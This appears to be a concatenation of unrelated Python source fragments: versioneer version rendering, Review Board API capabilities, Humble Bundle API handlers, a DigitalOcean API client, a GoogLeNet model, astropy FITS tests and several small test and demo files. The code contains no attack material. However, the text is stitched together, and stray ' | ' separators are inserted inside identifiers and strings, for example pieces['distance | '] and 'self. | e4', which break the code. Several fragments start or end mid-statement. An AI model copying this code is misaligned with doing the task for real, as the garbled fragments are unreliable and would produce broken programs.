date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty | it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance | "], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
|
from __future__ import unicode_literals
import logging
from django.conf import settings
from reviewboard import get_version_string, get_package_version, is_release
from reviewboard.admin.server import get_server_url
_registered_capabilities = {}
_capabilities_defaults = {
'diffs': {
'base_commit_ids': True,
'moved_files': True,
'validation': {
'base_commit_ids': True,
}
},
'review_requests': {
'commit_ids': True,
},
'scmtools': {
'git': {
'empty_files': True,
},
'mercurial': {
'empty_files': True,
},
'perforce': {
'moved_files': True,
'empty_files': True,
},
'svn': {
'empty_files': True,
},
},
'text': {
'markdown': True,
'per_field_text_types': True,
'can_include_raw_values': True,
},
}
def get_server_info(request=None):
"""Returns server information for use in the API.
This is used for the root resource and for the deprecated server
info resource.
"""
capabilities = _capabilities_defaults.copy()
capabilities.update(_registered_capabilities)
return {
'product': {
'name': 'Review Board',
'version': get_version_string(),
'package_version': get_package_version(),
'is_release': is_release(),
},
'site': {
'url': get_server_url(request=request),
'administrators': [
{
'name': name,
'email': email,
}
for name, email in settings.ADMINS
],
'time_zone': settings.TIME_ZONE,
},
'capabilities': capabilities
}
def register_webapi_capabilities(capabilities_id, caps):
"""Registers a set of web API capabilities.
These capabilities will appear in the dictionary of available
capabilities with the ID as their key.
A capabilties_id attribute passed in, and can only be registerd once.
A KeyError will be thrown if attempting to register a second time.
"""
if not capabilities_id:
raise ValueError('The capabilities_id attribute must not be None')
if capa | bilities_id in _registered_capabilities:
raise KeyError('"%s" is already a registered set of capabilities'
| % capabilities_id)
if capabilities_id in _capabilities_defaults:
raise KeyError('"%s" is reserved for the default set of capabilities'
% capabilities_id)
_registered_capabilities[capabilities_id] = caps
def unregister_webapi_capabilities(capabilities_id):
"""Unregisters a previously registered set of web API capabilities."""
try:
del _registered_capabilities[capabilities_id]
except KeyError:
logging.error('Failed to unregister unknown web API capabilities '
'"%s".',
capabilities_id)
raise KeyError('"%s" is not a registered web API capabilities set'
% capabilities_id)
|
import _plotly_utils.basevalidators
class ValueminusValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, p | lotly_name="valueminus", parent_name="scatter3d.error_z", **kwargs
):
super(ValueminusValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", | "info"),
**kwargs
)
|
from httpx import AsyncClient
# Runtime import to avoid syntax errors in samples on Python < 3.5 and reach top-dir
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join(( |
os.path.dirname(__file__),
'../',
)),
)
_SAMPLES_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../samples/',
)),
)
import sys
sys.path.append(_TOP_DIR)
sys.path.append(_SAMPLES_DIR)
from asyncutils import AsyncTestCase
from wiringfastapi import we | b
class WiringFastAPITest(AsyncTestCase):
client: AsyncClient
def setUp(self) -> None:
super().setUp()
self.client = AsyncClient(app=web.app, base_url='http://test')
def tearDown(self) -> None:
self._run(self.client.aclose())
super().tearDown()
def test_depends_marker_injection(self):
class ServiceMock:
async def process(self):
return 'Foo'
with web.container.service.override(ServiceMock()):
response = self._run(self.client.get('/'))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'result': 'Foo'})
def test_depends_injection(self):
response = self._run(self.client.get('/auth', auth=('john_smith', 'secret')))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json(), {'username': 'john_smith', 'password': 'secret'})
|
'''
:codeauthor: {{full_name}} <{{email}}>
'''
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
from tests.support.mock import patch
import salt.states.{{module_name}} as {{module_name}}
class {{ | module_name|capitalize}}TestCase(TestCase, LoaderModuleMockMixin):
def se | tup_loader_modules(self):
return {% raw -%} {
{% endraw -%} {{module_name}} {%- raw -%}: {
'__env__': 'base'
}
} {%- endraw %}
def test_behaviour(self):
# Test inherent behaviours
pass
|
import logging
from autotest.client import utils
from autotest.client.shared import error
from virttest import env_process, utils_test
@error.context_aware
def run(test, params, env):
"""
Vhost zero copy test
1) Enable/Disable vhost_net zero copy in host
1) Boot the main vm.
3) Run the ping test, check guest nic works.
4) check vm is alive have no crash
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def zerocp_enable_status | ():
"""
Check whether host have enabled zero copy, if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vhost_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
| return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
# in vm.verify_alive will check whether have userspace or kernel crash
error.context("Check guest is alive and have no crash", logging.info)
vm.verify_alive()
|
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_ | datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
settings.SENTRY_DIGESTS_OPTIONS,
(DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEnt | ry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
'maximum_delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
|
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
| )
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=res | ponse,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
# If the request is unauthorized (this includes invalid machine names) this
# response has it's own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
|
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
start = time.ct | ime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerIndex], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
|
if __name__ == "__main__":
for i in xrange(len(speakers)):
main2(numMixtures=8, speakerIndex=i) |
default_app_config = 'user_deletion.ap | ps.UserDeleti | onConfig'
|
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = | self. | e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
|
on = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
json.pop('status', None)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
def restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
| json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
| def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params= {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/new/' % domain_id, params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but actually it 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
return self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
def request(self, path, params={}, method='GET'):
params['client_id'] = self.client_id
params['api_key'] = self.api_key
if not path.startswith('/'):
path = '/'+path
url = API_ENDPOINT+path
try:
resp = requests.get(url, params=params, timeout=60)
json = resp.json()
except ValueError: # requests.models.json.JSONDecodeError
raise ValueError("The API server doesn't respond with a valid json")
e |
e(0, 1, 7000)
arr[1] = np.random.normal(size=7000)
hdu = fits.CompImageHDU(data=arr)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
comp_hdu = hdul[1]
# GZIP-compressed tile should compare exactly
assert np.all(comp_hdu.data[0] == arr[0])
# The second tile uses lossy compression and may be somewhat off,
# so we don't bother comparing it exactly
def test_duplicate_compression_header_keywords(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2750
Tests that the fake header (for the compressed image) can still be read
even if the real header contained a duplicate ZTENSION keyword (the
issue applies to any keyword specific to the compression convention,
however).
"""
arr = np.arange(100, dtype=np.int32)
hdu = fits.CompImageHDU(data=arr)
header = hdu._header
# append the duplicate keyword
hdu._header.append(('ZTENSION', 'IMAGE'))
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert header == hdul[1]._header
# There's no good reason to have a duplicate keyword, but
# technically it isn't invalid either :/
assert hdul[1]._header | .count('ZTENSION') == 2
def test_scale_bzero_with_compressed_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
and https://github.com/astropy/astropy/issues/4588
Identical to test_scale_bzero_with_in | t_data() but uses a compressed
image.
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.CompImageHDU(data=a.copy())
hdu2 = fits.CompImageHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_compressed_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Identical to test_scale_back_uint_assignment() but uses a compressed
image.
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.CompImageHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as hdul:
hdul[1].data[:] = 0
assert np.allclose(hdul[1].data, 0)
def test_compressed_header_missing_znaxis(self):
a = np.arange(100, 200, dtype=np.uint16)
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZNAXIS')
with pytest.raises(KeyError):
comp_hdu.compressed_data
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZBITPIX')
with pytest.raises(KeyError):
comp_hdu.compressed_data
@pytest.mark.parametrize(
('keyword', 'dtype', 'expected'),
[('BSCALE', np.uint8, np.float32), ('BSCALE', np.int16, np.float32),
('BSCALE', np.int32, np.float64), ('BZERO', np.uint8, np.float32),
('BZERO', np.int16, np.float32), ('BZERO', np.int32, np.float64)])
def test_compressed_scaled_float(self, keyword, dtype, expected):
"""
If BSCALE,BZERO is set to floating point values, the image
should be floating-point.
https://github.com/astropy/astropy/pull/6492
Parameters
----------
keyword : `str`
Keyword to set to a floating-point value to trigger
floating-point pixels.
dtype : `numpy.dtype`
Type of original array.
expected : `numpy.dtype`
Expected type of uncompressed array.
"""
value = 1.23345 # A floating-point value
hdu = fits.CompImageHDU(np.arange(0, 10, dtype=dtype))
hdu.header[keyword] = value
hdu.writeto(self.temp('test.fits'))
del hdu
with fits.open(self.temp('test.fits')) as hdu:
assert hdu[1].header[keyword] == value
assert hdu[1].data.dtype == expected
@pytest.mark.parametrize('dtype', (np.uint8, np.int16, np.uint16, np.int32,
np.uint32))
def test_compressed_integers(self, dtype):
"""Test that the various integer dtypes are correctly written and read.
Regression test for https://github.com/astropy/astropy/issues/9072
"""
mid = np.iinfo(dtype).max // 2
data = np.arange(mid-50, mid+50, dtype=dtype)
testfile = self.temp('test.fits')
hdu = fits.CompImageHDU(data=data)
hdu.writeto(testfile, overwrite=True)
new = fits.getdata(testfile)
np.testing.assert_array_equal(data, new)
def test_comphdu_bscale(tmpdir):
"""
Regression test for a bug that caused extensions that used BZERO and BSCALE
that got turned into CompImageHDU to end up with BZERO/BSCALE before the
TFIELDS.
"""
filename1 = tmpdir.join('3hdus.fits').strpath
filename2 = tmpdir.join('3hdus_comp.fits').strpath
x = np.random.random((100, 100))*100
x0 = fits.PrimaryHDU()
x1 = fits.ImageHDU(np.array(x-50, dtype=int), uint=True)
x1.header['BZERO'] = 20331
x1.header['BSCALE'] = 2.3
hdus = fits.HDUList([x0, x1])
hdus.writeto(filename1)
# fitsverify (based on cfitsio) should fail on this file, only seeing the
# first HDU.
with fits.open(filename1) as hdus:
hdus[1] = fits.CompImageHDU(data=hdus[1].data.astype(np.uint32),
header=hdus[1].header)
hdus.writeto(filename2)
# open again and verify
with fits.open(filename2) as hdus:
hdus[1].verify('exception')
def test_scale_implicit_casting():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations.
hdu = fits.ImageHDU(np.array([1], dtype=np.int32))
hdu.scale(bzero=1.3)
def test_bzero_implicit_casting_compressed():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations. Astropy is
# actually not able to produce a file that triggers the failure - the
# issue occurs when using unsigned integer types in the FITS file, in which
# case BZERO should be 32768. But if the keyword is stored as 32768.0, then
# it was possible to trigger the implicit casting error.
filename = os.path.join(os.path.dirname(__file__),
'data', 'compressed_float_bzero.fits')
with fits.open(filename) as hdul:
hdu = hdul[1]
hdu.data
def test_bzero_mishandled_info(tmpdir):
# Regression test for #5507:
# Calling HDUList.info() on a dataset which applies a zeropoint
# from BZERO but which astropy.io.fits does not think it needs
# to resize to a new dtype results in an AttributeError.
filename = tmpdir.join('floatimg_with_bzero.fits').strpath
hdu = fits.ImageHDU(np.zeros((10, 10)))
hdu.header['BZERO'] = 10
hdu.writeto(filename, overwrite=True)
with fits.open(filename) as hdul:
hdul.info()
def test_image_write_readonly(tmpdir):
# Regression test to make sure that we can write out read-only arrays (#5512)
x = np.array([1, 2, 3])
x.setflags(write=False)
ghdu = fits.ImageHDU(data=x)
ghdu.add_datasum()
filename = tmpdir.join('test.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1, 2, 3])
# Same for compressed HDU
x = np.array([1.0, 2.0, 3.0])
x.setflags(write=False)
ghdu = fits.CompImageHDU(data=x)
# add_datasum does not work for CompImageHDU
# ghdu.add_datasum()
filename = tmpdir.join('test2.fits').strpath
ghdu.writeto(filename |
# -*- coding: utf-8 -*-
# Copyright (c) | 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
| class TestCMPaperManagement(unittest.TestCase):
pass
|
from collections import defaultdict
import colorsys
import pg
def noise(x, z):
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height | [(x, z)] = noise(x, z)
